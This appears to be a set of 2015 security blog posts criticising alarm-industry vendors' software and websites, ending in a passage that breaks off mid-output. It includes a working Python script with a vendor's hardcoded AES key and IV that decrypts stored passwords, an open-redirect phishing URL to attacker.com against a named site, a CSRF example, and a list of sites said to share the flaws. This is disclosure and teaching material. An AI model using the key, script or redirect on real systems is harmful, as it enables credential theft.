Vulnerability in password storage in Risco Configuration Software

During a routine pen-test of an alarm receiving centre, a piece of software was found that was used to remotely configure Risco alarms.

The software is backed by a SQL database called “ConfigurationSoftware” which contains a table called ut_Users with a column called PWD which stores passwords for users that can log into the system.

This PWD field appeared to be a base64 encoded string.

On further investigation, the password turned out to be stored in an encrypted form. This allows it to be recovered from the software, and doesn't follow the best practice of hashing passwords.

The encryption is AES-256 in CBC mode and uses a fixed key and IV which are hardcoded into the application.

Passwords were recovered from the database which, due to password re-use, allowed me to take control of the company's domain controller and website. The password was of good complexity, so if hashing had been used, I would have been unlikely to recover it.

A Python script to decrypt the passwords is shown below.

from Crypto.Cipher import AES
import base64

BS = 32
# PKCS #7-style padding to a 32-byte boundary (a multiple of the 16-byte AES block)
pad = lambda s: s + (BS - len(s) % BS) * bytes([BS - len(s) % BS])
unpad = lambda s: s[:-s[-1]]

def encrypt(raw, key, iv):
    cipher = AES.new(key, AES.MODE_CBC, iv)
    return cipher.encrypt(pad(raw))

def decrypt(enc, key, iv):
    cipher = AES.new(key, AES.MODE_CBC, iv)
    return unpad(cipher.decrypt(enc))

# Static and hardcoded in the application
key = b'FKLe608FDsF5J6ZaKpTghjED7Hb80ALq'
iv = b'Sckt6DopykVCD9Lq'

# The default 123 password as installed
ciphertext = 'BQqwo4a87TvfJKv4af8h3g=='

# The decrypted plaintext is UTF-16-LE encoded
print('Password is %s' % decrypt(base64.b64decode(ciphertext), key, iv).decode('utf-16-le'))

This was reported to Risco on 7th August. A fix is meant to be deployed at the beginning of November.

Conclusion

  • Hash, don’t encrypt your passwords.
  • Don’t hardcode encryption keys in your software
  • Don’t use the same password for domain admin as in a system of unknown quality
  • Have a security contact so it’s not painful to report issues

Terrible website security on www.apprentices4fs.com

Companies in the physical security world often seem to have awful virtual security.

This site – “Apprentices for Fire & Security” – is a prime example of absolutely awful virtual security. And once again, these are not subtle issues – they are indicative of incompetent developers working on the security aspects of a website. Stop entrusting your security to people who do not know what they are doing.

Let us go through the obvious issues:

No HTTPS anywhere

The site handles passwords, emails, addresses, names, CVs, job postings. This is confidential information.

None of this is protected by HTTPS. It is all sent in the plain.

This is not forgivable in 2015. It is embarrassing that anyone can deploy a site handling logins and CVs without it.

Update: as of mid-morning 9/11, HTTPS has been turned on for apprentices4fs.com and some other domains. You have to ask, why was this not done in the first place?

Passwords are emailed to users

When you set up your account, you choose a password. This password is immediately emailed to you.

This means that your password has now been sent in the plain across the Internet.

This is not good practice for very obvious reasons.

Passwords are stored in the plain

When you fill in the password reminder, your original password is emailed to you. This means the passwords are not hashed.

This means that if the database were to leak, it would reveal all the passwords.

This is terrible practice and it is widely known that it is terrible practice.

Passwords are truncated

Enter a 100-character password, and send a password reminder. The plain text password is now only 20 characters long.

This is a side effect of plain text password storage. If you store the password in the plain, you have to limit the password length to something. If you hash the password, the password could be “War & Peace” and the hash would still be of a fixed length.
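To illustrate: a hash is a fixed length however long the input, so there is never a need to truncate. A quick sketch using Python's standard library (a real system should use a slow, salted scheme such as bcrypt or PBKDF2, but the fixed-length property is the same):

import hashlib

short_hash = hashlib.sha256(b'hunter2').hexdigest()
long_hash = hashlib.sha256(b'A' * 1000000).hexdigest()  # a million-character "password"

print(len(short_hash), len(long_hash))  # 64 64 - both hashes are 64 hex characters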

This is terrible practice.

Passwords are not case sensitive

If you set your password to AAAAAA, you can login to the system with aaaaaa.

Even if you are using plain text storage, you don’t need to do this.

This massively reduces the number of different passwords available.

This is terrible practice.

Detailed error logging is turned on

If an error occurs, you are given a detailed error log.

This leaks information such as the directory structure, what attack mitigation rules are in place and so on. Sometimes these error logs can even leak things like usernames and passwords.

They should be turned off on a production server. This is web admin 101.

Open redirect on login form

Often when you access a page that requires authentication, a site will pass a referrer (i.e. the page you were on) to the login page. This is so you are seamlessly returned to the page you wanted to access after logging in.

It’s absolutely vital that this referrer URL is not a free choice.

Why? Picture this attack.

The attacker sends this URL to the victim:

www.apprentices4fs.com/jobboard/cands/candLogin.asp?r=http://attacker.com/fakelogin.html

The victim logs in to the real site, and is redirected to the attacker's fake login page. This fake page says that the victim has entered their password incorrectly.

The victim logs in again. His credentials are stored by the attacker, and he is returned to the genuine site.

This is a glaringly obvious issue and very serious.
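The fix is to only ever redirect to destinations you control. A rough sketch of the kind of check needed (illustrative Python, not their ASP code; the allowed host is simply their own domain):

from urllib.parse import urlparse

def safe_redirect_target(r, allowed_host="www.apprentices4fs.com"):
    parsed = urlparse(r)
    # Allow relative paths, or absolute URLs that point back at our own host
    if parsed.scheme in ("", "http", "https") and parsed.netloc in ("", allowed_host):
        return r
    return "/"  # anything else falls back to the homepage

print(safe_redirect_target("/jobboard/cands/candLogin.asp"))       # allowed
print(safe_redirect_target("http://attacker.com/fakelogin.html"))  # rejected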

No protection against cross-site request forgery

There is no evidence of any protection against cross-site request forgery (CSRF). This includes pages used to change passwords and other details.

Cross-site request forgery means I can send a crafted link to a user (e.g. by email), and if they click on the link, the action will be carried out as the user.

A very simple example would be something like:

www.apprentices4fs.com/jobboard/cands/candLogin.asp?password=ABCDEF

And the logged in user would have their password changed to ABCDEF.

The actual mechanics are more complex than this. Regardless, you cannot deploy a public facing website dealing with logins or confidential information without CSRF protection.
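The standard defence is a per-session anti-CSRF token, embedded in every form and checked on submission. A minimal sketch of the idea (illustrative Python, not a drop-in fix for their site):

import hmac
import secrets

def issue_csrf_token(session):
    # Generated once per session and embedded in every form as a hidden field
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]

def check_csrf_token(session, submitted):
    expected = session.get("csrf_token", "")
    # Constant-time comparison; reject the request if the token doesn't match
    return bool(expected) and hmac.compare_digest(expected, submitted)

session = {}
token = issue_csrf_token(session)
print(check_csrf_token(session, token))     # True - legitimate form submission
print(check_csrf_token(session, "forged"))  # False - cross-site request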

Cookies don't have the HTTPOnly flag set

Cookies are used to remember that you are logged into a site using something called a session token. If you get hold of someone else’s session token, you can act as if you were logged in as them.

A common attack is to steal a cookie by making the browser run malicious Javascript (exploiting a vulnerability called XSS) that sends the cookie to an attacker.

The HTTPOnly flag prevents JavaScript from reading the cookie, which makes stealing it much harder. Above all, there is almost never a penalty to setting it – it has no downsides.
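Setting the flag is typically a one-line change. For example, building the header with Python's standard library (illustrative only – the session token here is made up):

from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["session"] = "d41d8cd98f00b204e9800998ecf8427e"  # hypothetical session token
cookie["session"]["httponly"] = True  # not readable from JavaScript
cookie["session"]["secure"] = True    # only ever sent over HTTPS
print(cookie.output())
# Set-Cookie: session=d41d8cd98f00b204e9800998ecf8427e; HttpOnly; Secure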

Again, this is basic stuff.

An arsehole security warning

Do anything they don't like, and you get this (which has since been changed to a plain 403).

There’s a strong correlation, in my experience, between OTT warnings like this and incompetence.

Overzealous XSS filters

It’s vital you protect your site from an attack called XSS, where an attacker tries to inject their own JavaScript into your pages.

There are a number of ways of doing this. You can detect basic attempts and warn a user that there is an issue, probably logging the issue and alerting admins. If there is a persistent and realistic threat, start banning IPs.

Immediately locking the IP out and issuing them with a ridiculous warning is not how to do XSS protection.

Visit the search page and search for <script>. Or just click here to do it for you. Be warned: you will be banned from the site.

This has since been hidden, but someone had kindly screenshotted it:

WhoopWhoopTheInternetPolice

In my experience of looking at over 100 sites, the ones that react to XSS like this tend to have wholly ineffective XSS filters – they only deal with the very obvious, and can be subverted. It’s like putting up a “Warning – Guard Dogs” sign, without the guard dogs.

Totally ineffective banning

If you trigger the overzealous XSS filters, you are banned. Or so it says.

That is, unless you use another browser. Or just manually change the user agent.

I suspect they have done this because otherwise you could easily perform a denial-of-service attack by getting many IPs banned.

This banning is token at best, and provides no extra security.

No security contact

Well, no contact at all. What do you have to do to get these people to respond to a security issue?

Conclusion

The security of this site is about as bad as it can get without just leaving everything in the open. There has been little to no regard for the security of the data or users, to the level that it is either extreme incompetence or negligence.

What is more worrying is that the people who developed this sell it as a product.

And, of course, who is behind this particular site? CSL Dualcom.

Update

99 other sites running software by the same company.

http://www.ballandhoolahan.co.uk/
http://www.scotjobsnet.co.uk/
http://www.careersforcare.co.uk/
http://www.bacme.com/
http://www.nqajobs.com
http://www.executive-careers.com
http://www.qualityjobs.org.uk
http://www.speech-language-therapy-jobs.org
http://www.sci-search.com
http://www.hawkinsthompson.com
http://www.barringtonjames.com
http://www.cybersecurityjobsite.com
http://www.renewablesjobshop.co.uk
http://www.forwardingjobs.com
http://www.gamesjobsdirect.com
http://jobs.midwives.co.uk
http://www.jobswithballs.com
http://www.computerjobs.ie/
http://www.housebuildingcareers.co.uk
http://www.hozpitality.ca
http://www.audiovisualjobs.com
http://www.medicaldirectorjobs.co.uk
http://jobs.bsee.co.uk
http://www.britishmedicaljobs.com
http://jobs.legalsupportnetwork.co.uk
http://www.mbmtravelexecutives.co.uk
http://www.understandingrecruitment.co.uk
http://www.robertsonbell.co.uk
http://www.thedovepartnership.co.uk
http://www.risetechnicalrecruitment.co.uk
http://www.balancerecruitment.com
http://www.atkinsonpage.co.uk
http://www.charismarecruitment.co.uk
http://www.cornucopiaitr.com
http://www.dnarecruit.com
http://www.talentcrew.co.uk
http://www.synergizecl.co.uk
http://www.primeuk.com
http://www.astoncharles.co.uk
http://www.adept-recruitment.co.uk
http://www.pensioncareers.co.uk
http://www.lawrencedeanrecruitment.co.uk
http://www.signetresources.co.uk
http://www.abikaconsulting.com
http://www.f10.co.uk
http://www.robertgilesagencies.com
http://www.esprecruitment.co.uk
http://www.market-recruitment.co.uk
http://www.creativepersonnel.co.uk
http://www.quicksilverjobs.co.uk
http://www.mitchellmaguire.co.uk
http://www.jimmyredrecruitment.com
http://www.westinpar.com
http://www.thesjbgroup.com
http://www.autoskills-uk.com
http://www.medtechsearch.co.uk
http://www.michaelbaileyassociates.com
http://www.encorepersonnel.co.uk
http://www.scanlonsearch.com
http://www.liquidhc.com
http://www.bodenresource.co.uk
http://www.gpa-procurement.com
http://www.lawconsultants.co.uk
http://www.demobjob.co.uk
http://www.cameronbrook.co.uk
http://www.clayton-recruitment.co.uk
http://www.ceemarecruitment.co.uk
http://www.craconsultants.com
http://www.pro-tax.co.uk
http://www.theoceanpartnership.com
http://www.agrifj.co.uk
http://www.bluecrestrecruitment.co.uk
http://www.brightleaf.co.uk
http://www.sterlingcross.com
http://www.fireandsecurityjobs.com
http://www.cprecruitment.co.uk/
http://www.academicsltd.com.au
http://www.centopersonnel.com
http://www.navis-consulting.com
http://www.oswinstrauss.com
http://www.eatjobs.co.uk/
http://www.oysterpartnership.com
http://www.oceanicresources.com
http://www.greenjobs.ie
http://www.pro-finance.co.uk
http://www.branwellford.co.uk
http://jobs.pmlive.com
http://www.creampersonnel.co.uk
http://www.acfinancial.co.uk
http://www.kasus.co.uk
http://www.liftandescalatorjobs.com
http://jobs.nasaconsulting.com
http://www.careersforcare.co.uk
http://www.kbbrecruitment.co.uk
http://www.nwmjobs.co.uk
http://www.i-payejobs.com
http://www.racsgroupjobs.com
http://jobs.paystream.co.uk
http://www.buildingproductjobs.com

They have 99 problems, but their HTTPS configuration isn’t one, because they don’t use it.

Why you shouldn’t listen to Pat Burns on LinkedIn

An article entitled “Why The Internet of Things and the Cloud Should Break Up” showed up on Reddit and Twitter earlier this week. It sounded promising – I’m a proponent of decoupling IoT systems so that they don’t rely on the cloud, even if they still use the cloud most of the time. What I was greeted with was a terrible opinion piece, full of misinformation.

I don’t know where to start, it’s so bad.

A FitBit wristband connects via Bluetooth with your smartphone but sends your activity data to a FitBit cloud app. Does your personal health data really need to sit in the cloud or can you extract sufficient value from it by simply keeping the data stored locally on your smartphone?

This isn't the IoT. That's a Bluetooth device connecting to a phone. He seems to be one of those people who will call anything that is connected and isn't a full-blown machine "IoT".

For most of the IT industry — let’s just get this on the table — the cloud today is the hammer and there’s almost nothing that isn’t a nail. And the cloud is an easy place to build an IoT application and operates without the messy hassles of embedded software, endpoint security, FCC regulations, or fertility risks, to name a few.

Firstly, using the cloud generally means adding functionality to endpoints. Take a standard IP camera, accepting connections on port 80, using port-forwarding for remote access. Add cloud functionality to allow remote streaming and the system takes more time to develop. It is not a freebie.

Secondly, using the cloud normally makes endpoint security much less of an issue. Traditional architectures, such as port-forwarding to devices, or customers running their own infrastructure, involve inbound connections to your network and endpoints. Many cloud-connected devices have absolutely no ports open at all – the SmartThings v2 hub, for example. Because of this, endpoint security becomes a lot less difficult.

Thirdly, regardless of your architecture, if you want to use wireless connectivity, you need to deal with RF. I don’t see how the cloud avoids this.

It’s cheap and everywhere. Like beer in your dorm, the cloud today is so popular and so well-capitalized that infecting the IoT was only a matter of when, not if. Spin-offs like cloud analytics or cloud perimeter security (no laughing!) are simply too affordable and too visible to pass up. Traditional enterprise IoT pilots that used to cost $250,000 in enterprise software and systems integration services can be executed at a fraction of this price now due to the cloud.

Developing and operating robust, secure cloud systems adds cost and complexity. People are not doing it to avoid cost.

Tools. Compared to older desktop-based tools, cloud-based environments and API’s are vastly simpler to use and integrate while offering robust functionality.

He seems to be conflating using a cloud-based development environment with operating in the cloud. Nearly all cloud-based solutions need significant development in traditional languages, on a desktop. It's not point-and-click.

Weak endpoints and edges. Endpoints that don’t do analytics, support real-time queries, or even support full two-way messaging tend to spew data remorselessly to an edge router and/or the cloud. Bluetooth, ZigBee, 6lowPAN, and others are all guilty as charged and as a result, they end up driving their users to the cloud.

He seems to have a bee in his bonnet about how “stealthy” wireless protocols are. There really is no link between the wireless protocol used and how much data ends up getting sent to the cloud. They are different layers – one a transport protocol, the other application. Zigbee does send a fair amount of beacon traffic, but none of this ends up outside the PAN. If your app sends a lot of traffic over Zigbee and then your gateway sends it to the cloud, that is not the fault of Zigbee.

It's not secure. This one is hard to overstate as crummy IoT security is the sordid "yeah, but" in so many discussions about the IoT. IDC predicts that nearly every IT network will have an IoT security breach by the end of 2016 and IT departments are in full freakout mode now. Endpoint security is comically bad and compounded with a hacker-friendly cloud, what could go wrong?

There is absolutely nothing inherent in the cloud architecture that makes it insecure. In fact, there can be a lot of advantages:

  • Endpoints no longer need to accept any incoming connections
  • Endpoints and gateways accept no user-input, massively simplifying design of secure interfaces
  • Connecting to a central point facilitates use of IDS, a skilled operations team, and regular centralised updates

Equally, there is nothing inherent in a cloud architecture that means the endpoints are insecure. An insecure endpoint will be insecure regardless of the architecture.

It’s not real-time. IoT apps that require real-time responses can’t tolerate the extra seconds or minutes required for a cloud lookup.

and later:

Waiting 2–3 minutes for a cloud app to make time for you is a non-starter.

This is just pure misinformation. Going over the Internet adds latency, but it doesn't add "2–3 minutes" – it typically adds milliseconds. 2–3 minutes means the system has been designed badly, and this would be an issue regardless of where it operates.

It may not be faithful. The integrity of your data in the cloud is only as good as the people and systems hosting it. Sensors in your manufacturing facility in Taipei showing you running at 50% below your normal run rate or showing a supply chain hiccup? Hedge funds and competitors enjoy learning about this kind thing!

The integrity of your data on your self-hosted platform is only as good as the people and systems hosting it. Again, nothing inherent about cloud. I would rather have a skilled operations team managing intrusion detection, performance monitoring and disaster recovery than burden a sysadmin with yet another system in-house.

Getting out may be easier than getting in. Once you’ve married a cloud service, how easy will it be to disengage/migrate to another solution at some future date? Is standardization and interoperability in a state that will increase the risk of vendor lock-in? What if the cloud vendor is bought by your competitor and changes policies?

Which is equally true of any bought-in platform. Just remove the word "cloud" from the above paragraph. Vendor lock-in is real, however.

A new golden rule of IoT network design is to store sensor data as close as possible to its point of origin and limit its sharing across the network unless absolutely necessary.

You can't just invent golden rules. Many people want low-cost, low-power endpoints with no storage and no persistence, pushing everything to more powerful gateways or servers. The AWS and Azure IoT platforms both accommodate this. This is Pat Burns's golden rule, designed to sell his product.

The endpoint is key to the golden rule. Better processors, cheaper memory, and better networking stacks from companies like Haystack are evolving endpoints from dumb terminals to independent, distributed computing devices with real-time query (think Google for the IoT) and NoSQL-like filesystem support. Endpoint-centric designs also have the bonus of being more stealthy and secure, faster, cheaper, and better stewards of battery life and wireless bandwidth. In short, good IoT network design should begin with the endpoint in mind and “dumb” endpoint technologies that beacon or create unnecessary security risks should be phased out

I just don’t know where to begin on this.

The enemy of security is complexity. Are you actually trying to argue that having hundreds of endpoints in a distributed network, able to store data and be queried, are going to be more secure than, say, a memory-based RFID tag? Or a transmit-only 8-bit PIC based humidity sensor?

How are these endpoints cheaper?

What is his issue with beacons and stealth? Well – it’s lucky there is another article – “A Simple Proposal To Improve Security for the Internet of Things” to help us demolish yet another series of misconceptions and misinformation.

Almost every IoT security breach in recent news can be traced to the poor architecture of the wireless protocol used by the device.

No, no they can’t.

Firstly, that is very, very specific. “Poor architecture of the wireless protocol”. Not “Weak implementation of the wireless protocol” or “devices using wireless protocols”.

Secondly, neither of the links provided describes a breach. A breach is the result of a system being exploited. One is information leakage, the other is a report of a vulnerability.

Thirdly, the Jeep hack was nothing to do with the wireless protocol. Jeeps could be using wired Ethernet and the same issues would have been present.

Fourthly, nearly every IoT breach in recent news has been carried out over the Internet, not by local attacks on the wireless protocol. There is a lot of research into wireless security, and there is a lot of noise at conferences, but the bulk of issues occur remotely over the Internet. Hackers are not sat outside homes and businesses cracking your Zigbee or wireless burglar alarm.

Avoiding or minimizing the chances of unauthorized discovery is not technically difficult. But today’s IoT technologies like Bluetooth, 6lowpan, Sigfox, LoRaWAN, and others make unauthorized discovery very easy and it creates the worst kind of angst in IT departments.

Most of the protocols make discovery easy because it is intentional. They layer security on top of discoverability, enabling systems that people can actually use and that are actually deployed (unlike Dash7).

The link doesn’t support that unauthorised discovery is causing angst in IT departments. He seems to often do this – provide a link which is vaguely related but doesn’t support the argument. It would be fair to say “IoT is causing angst in IT departments”.

Most wireless IoT technologies were originally conceived as ways to stream large files (Bluetooth, WiFi) while some were designed to be “lighter” versions of WiFi (e.g., ZigBee). Today they are being re-positioned as “IoT” technologies and security, to put it nicely, is an afterthought. Oh yes — some have tried to “layer on” security and may profess to support encryption

Layering encryption onto a transport protocol is completely valid. It's widely acknowledged that ZigBee, Z-Wave and WiFi, if implemented correctly, are secure against the risk profile that is involved. Skilled hackers are not sat outside your house, waiting for you to pair your Hue bulbs to the hub so they can grab the keys. It is not happening. Even if they did, all they can do is turn your lights on and off.

I have no idea why they only "profess" to support encryption – they all offer encryption. WPA2 is actually a very secure protocol.

hacks for all of these technologies are quite public yet fundamentally traceable to one original sin:

these wireless IoT technologies don’t know how to keep quiet.

What? What hacks of wireless protocols can be traced to not keeping quiet?

More recently, drones are being used to hunt for ZigBee-based endpoints, giving bad actors an easy way to discover, map, and hack ZigBee endpoints:

No, drones are being used to map Zigbee broadcast traffic. This is not enabling anyone to hack Zigbee any more than putting your house number on the door enables someone to pick your locks.

this type of hack provides all sorts of information about each endpoint, including manufacturer ID.

This is not a hack.

This need to be “discoverable” — and this is not limited to ZigBee, Bluetooth or WiFi but to most wireless IoT technologies — requires a near-constant advertising of a device’s presence, leading to any number of “disaster scenarios” that others have extensively written about.

The link, again, doesn’t support that a wireless protocol being discoverable will lead to any disaster scenario. Just pile the links on and hope no one checks.

There is no technical reason that the Internet of Things cannot embrace silence, or stealth as I prefer to call it, as a first principle of endpoint security. Stealth is not a silver bullet for IoT security (there is no silver bullet) and stealth alone won’t protect a network from intrusions, but dollar-for-dollar, stealth is the simplest, cheapest, and most effective form of IoT security protection available.

There is, quite literally, nothing to support this position.

An endpoint, receiving and sending plaintext, unauthenticated commands and data, will not see a noticeable improvement in security. Passive monitoring of the channel will still leak data, and active tampering will cause havoc. The stealth must be broken for the device to send, and this can be seen.

An endpoint, receiving and sending encrypted, authenticated commands and data, will not see a noticeable improvement in security. The data is still encrypted. Unauthenticated commands won’t be carried out.

This is just garbage.

Dollar for dollar, it might be worth making your nodes quieter, but not at the cost of switching from a widely adopted, widely inspected wireless standard to Dash7.

He tries to explain why:

Cloaking. It is harder to discover, hack, spoof, and/or “stalk” an endpoint if a hacker cannot locate the endpoint.

Endpoints need to send. Being stealthy can reduce the traffic but there will still be traffic. Stealth is only a weak layer of security through obscurity.

Googling the IoT. Stealth enables real-time queries of endpoints, a la Google search that non-stealthy endpoints can’t support. Stealth also enables fast queries (<2 seconds) in environments with thousands of endpoints, in turn enabling big data analytics at the true edge of the network.

This has absolutely nothing to do with how stealthy communications are from the node. If you enable your node to be queried, it can be queried. In fact, querying and accessing data at the edge of a network almost negates attempts at being stealthy, as you will see an increase in complex and important traffic on the wireless network.

Minimize interference. Less data being transmitted minimizes the opportunities for interference and failed message transmissions. Contrast this with the tragedy of the commons at 2.45 GHz, where WiFi, ZigBee, microwave ovens, and other countless other technologies engage in wireless gladiatorial combat and cause too many customers to return their IoT gadgets because they “don’t work”.

Again, this has very little to do with stealth. 434MHz – which Dash7 uses – has as many issues with contention as 2.4GHz. In the UK, there are many more poor-quality, untested, non-standards-compliant transmitters in the 434MHz band than there are at 2.4GHz.

Access control. Stealthy endpoints make it easier to control access to the endpoint by limiting who can query the endpoint.

Again, absolutely no link between stealth and access control. If you limit access to something, you limit access to it.

Storage. Less data being transmitted reduces storage costs. Storage vendors, on the other hand, love the non-stealthy IoT status quo.

Again, what? If your endpoint decides to ditch data, then your cloud can also decide to ditch data. This has nothing to do with the stealth of the wireless protocol – it's about the volume of data at the application layer.

At this point, I’m bored of this. These articles are utter crap.


InSecurTek Monitoring

Update

The director of IT from Securtek got in touch via the contact form. They are working to fix these issues, and his response was measured and reasonable, especially in light of my rather inflammatory blog post.

Thank you for bringing this to our attention.  We will be taking steps immediately to correct this situation, both in the short-term and in the long-term.
– Bryan Watson, Director of IT, SecurTek Monitoring Solutions

Introduction

Another security industry website, another slew of basic mistakes.

SecurTek are a Canadian company who offer alarm monitoring. Even just a cursory glance at their system shows that they are ignoring basic security principles.

No HTTPS

The login page is lacking HTTPS. There is no excuse for this in 2015 for a commercial web service of any form.

No HTTPS

Username enumeration

The login form responds differently depending on whether the user exists or not.

Username not found

This might seem minor, but it massively facilitates brute-forcing usernames and passwords by removing one of the unknowns. Best practice is to indicate that you have entered an incorrect username or password.
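Concretely, the login check should return the same response whichever part fails – something like this sketch (illustrative Python; the hashing here is simplified for brevity):

import hashlib
import hmac

def check_login(username, password, users):
    # users maps username -> hex SHA-256 of the password (illustration only;
    # a real system should use a slow, salted hash such as bcrypt)
    stored = users.get(username)
    supplied = hashlib.sha256(password.encode()).hexdigest()
    if stored is None or not hmac.compare_digest(stored, supplied):
        # Same message whether the username or the password was wrong
        return "Incorrect username or password"
    return None  # success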

Passwords are stored in the plain

The forgotten password functionality simply emails you the password you have already set.

Password in the plain

This has several implications.

It means that your password is stored in a way in which it can be retrieved. Whilst it may be encrypted, this encryption can be reversed, yielding the password. This is not good and nowhere near best practice. Passwords should be hashed at the bare minimum, which prevents them being recovered in this way.

Email is not a secure way of delivering a password. There is the potential for many people to see this password. With password re-use being common, obtaining the password for SecurTek could yield access to many other systems. A password reset mechanism should use a random token and be time-limited.
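A sane reset flow looks roughly like this – generate a random, single-use token, store only a hash of it, and make it expire (a sketch in Python, not SecurTek's code):

import hashlib
import hmac
import secrets
import time

RESET_TTL = 30 * 60  # reset links are valid for 30 minutes

def create_reset_token(store, email):
    token = secrets.token_urlsafe(32)
    # Store only a hash of the token, along with an expiry time
    store[email] = (hashlib.sha256(token.encode()).hexdigest(), time.time() + RESET_TTL)
    return token  # this goes into the emailed reset link - never the password

def redeem_reset_token(store, email, token):
    record = store.pop(email, None)  # single use
    if record is None:
        return False
    token_hash, expires = record
    if time.time() > expires:
        return False
    return hmac.compare_digest(hashlib.sha256(token.encode()).hexdigest(), token_hash)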

Conclusion

This is a 2-minute glance at security, and it has shown two very serious issues and one reasonably serious one. They aren't subtle issues.

Would you trust a company with your alarm monitoring if they can’t do these things right?

You don’t need to read or agree to a EULA to extract binaries

Impero Software have sent a particularly dickish letter to @TheWack0lian after he raised a security vulnerability (unauthenticated user remote command execution) in their software.

Impero’s entire complaint seems to be that their End User License Agreement (EULA) has been breached. Explicitly stated in the letter is that @TheWack0lian must have agreed to the EULA to mess around with the software. Really?

Letter extract

Let me tell you a secret, Impero and Gateley Plc

If you make your software downloadable (link dead now), you don’t need to run the installer to see what is inside it.

Windows has built-in tools that can unpack most MSI files. 7zip deals with the bulk of the rest. For those left, lessmsi will unpack them.

This is exactly the route I took after I downloaded Impero's software – simply unpacked it and started hacking.

Files in MSI

You could have handled this well; instead, I know that there are now at least three 0-days out there for the Impero software.

Stop doing client-side password hashing

Right, this has come up enough to write a post about it.

Stop hashing passwords on the client-side and sending the hash in the clear. It is not a substitute for HTTPS!

Here is an example of this being done on the DSC Security website. Go to “Security Professional Login”, and you get a pop-up login box. It looks like JavaScript is involved.

Note that the login page is served over HTTP (not HTTPS). This doesn’t always mean that the login credentials are passed over HTTP though. Sometimes the HTTP form submits to a HTTPS page.

This is still bad from a security perspective, as the attacker can deliver you a malicious login form that submits credentials to a server under his control.

Regardless, DSC aren’t doing anything over HTTPS – it’s all HTTP – so it is all sent in the plain. HTTPS is essentially free these days – there is no excuse to not use it.

That said, it appears that someone at DSC has realised that HTTP is a bad idea, so they have implemented… a thingy. A thingy that does little to improve security.

Here is the query that they send when I entered test/test:

GET /index.php?o=login&user=test&pwd=098f6bcd4621d373cade4e832627b4f6&remember=yes HTTP/1.1

So that parameter pwd isn’t test. What is it?

Let’s look at the JavaScript powering the site.

function login() {
    el = document.getElementById("lusername");
    el2 = document.getElementById("lpassword");
    el3 = document.getElementById("remember");
    url = "/index.php?o=login&user=" + encode(el.value) + "&pwd=" + md5(el2.value);
    if (el3 && el3.checked)
    {
        url += "&remember=yes";
    }
    initObj();
    showWait();
    if (xmlhttp!=null) {
      xmlhttp.onreadystatechange=_login;
      xmlhttp.open("GET",url,true);
      xmlhttp.setRequestHeader( "If-Modified-Since", "Sat, 1 Jan 2000 00:00:00 GMT" );
      xmlhttp.send(null);
    } else {
        url2 = "/index.php?o=login2&user=" + encode(el.value) + "&pwd=" + md5(el2.value);
        if (el3 && el3.checked)
        {
            url2 += "&remember=yes";
        }
        window.location=url2;
    }
}

Yes – it’s MD5ing the unsalted password test and submitting the hash.
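You can verify this yourself:

import hashlib

print(hashlib.md5(b'test').hexdigest())
# 098f6bcd4621d373cade4e832627b4f6 - the pwd parameter from the request above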

A passive observer of the traffic can still just sniff a single login and re-use the hash to login to DSC. They don’t need to know the password.

A passive observer could also obtain the password by cracking the MD5 hash. Because it is unsalted, the hash can even be googled to find the password. Salting is essential when using a hash to store passwords.

Even if the attacker couldn’t get the password by passive observation and cracking, they could simply serve up a login page that submits the original password to a server under their control.

This isn’t the first, second, third, fourth or even fifth time I have seen this. It’s useless. Stop doing it!

Note that DSC are also passing sensitive parameters as GET rather than POST. This means that the hash is stored in your URL history, proxies between you and the server etc.


Insecure CSL Dualcom mobile app

CSL Dualcom, the intruder alarm signalling provider, recently released a mobile app. It’s aimed at installers, and appears to allow them to perform site surveys (see signal strength for different networks) and view the status of devices they have installed. The promotional video also shows two pieces of data – ICCID and chip number – that, in my opinion, could be used to clone the CSL Dualcom device.

From promotional video

This is relatively sensitive data so I thought I’d take a quick look at the security measures they have taken in the app.

Unfortunately, a number of basic and unforgivable mistakes have been made.

Using Burp Suite, I proxied the traffic between the iOS app and CSL to see what was happening. I then downloaded the Android APK and viewed it in a decompiler.

No HTTPS

Nothing I can see in the traffic or app indicates that HTTPS is used anywhere – it’s all HTTP, albeit on a non-standard port 15136.

No HTTPS

This means that all data sent between the app and server is sent in the plain, and can be intercepted or altered by anyone in the middle.

On a mobile app, this is totally unforgivable, for a number of reasons:

  1. There are no cues to the user that the app is not using HTTPS. A browser makes it pretty clear when a site is using HTTPS. An app doesn’t.
  2. A mobile app can and will be used on unsecured WiFi and untrusted network connections. This massively increases your exposure to attack compared to using a trusted machine on a trusted network.

HTTPS is essentially free these days. The actual certificate is not expensive (and, for a mobile app, you can get away with self-signed and pinned certificates), and the increase in processing power required on the server and client is minimal.

Poor code quality

There are a number of signs that the code quality of the app is not up to scratch.

It sends your IMEI to their servers when it first runs, but the end-point just responds to tell you it’s invalid JSON. So you are sending sensitive information in the clear, but it’s being discarded anyway.

IMEI request

IMEI response

This is really quite sloppy and should have failed testing.

The code has typos in it e.g. IEMI, phon, etc.

Typos

Human readable error messages sent as responses end up as nonsense when presented to the user:

This makes sense…

But this makes no sense…

Conclusion

I’ve not even actually logged into the app yet, but the lack of HTTPS should be enough to stop anyone from using this app.

The lack of HTTPS was reported to CSL Dualcom on 26th June 2015. A review of the Android app on 28th October 2015 shows that it is now using HTTPS, but it has not been checked for further issues.


Subjects don’t need to be preserved in Certificate Signing Requests

I’ve been playing round with certificates, keys and Certificate Signing Requests (CSRs) whilst evaluating the security of an IoT solution.

I’ve had a longstanding misconception around CSRs and I thought I would document it here in case anyone else finds the same issue.

The purpose of a CSR is to request a certificate from a Certificate Authority (CA), where they sign your public key and a number of pieces of data called “subjects”. Normally these subjects, for HTTPS, are related to the domain.

The CSR in question looks like this:

root@kali:~# openssl req -in csr.req -text -noout
Certificate Request:
    Data:
        Version: 0 (0x0)
        Subject: emailAddress=cybergibbon@test.com
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (1024 bit)
                Modulus:
                    00:ea:a9:04:df:20:63:6d:78:8d:a4:c3:8a:7e:b5:
                    a9:38:a7:1d:2a:75:20:90:45:2d:c9:9e:b3:08:18:
                    a9:59:d4:79:95:40:ef:cc:4f:2c:93:73:21:02:05:
                    9b:47:c4:9b:73:21:a8:fe:da:9c:2c:71:98:f5:49:
                    37:a7:28:a4:f5:14:6a:a0:91:dd:a7:87:63:d4:b4:
                    2a:aa:a6:9b:b2:a4:72:ab:91:58:2b:e5:6e:34:84:
                    05:ce:c8:dc:7f:3c:33:5f:d2:14:27:37:34:ee:aa:
                    58:29:de:5c:f5:b7:93:69:94:a9:20:02:84:fb:cd:
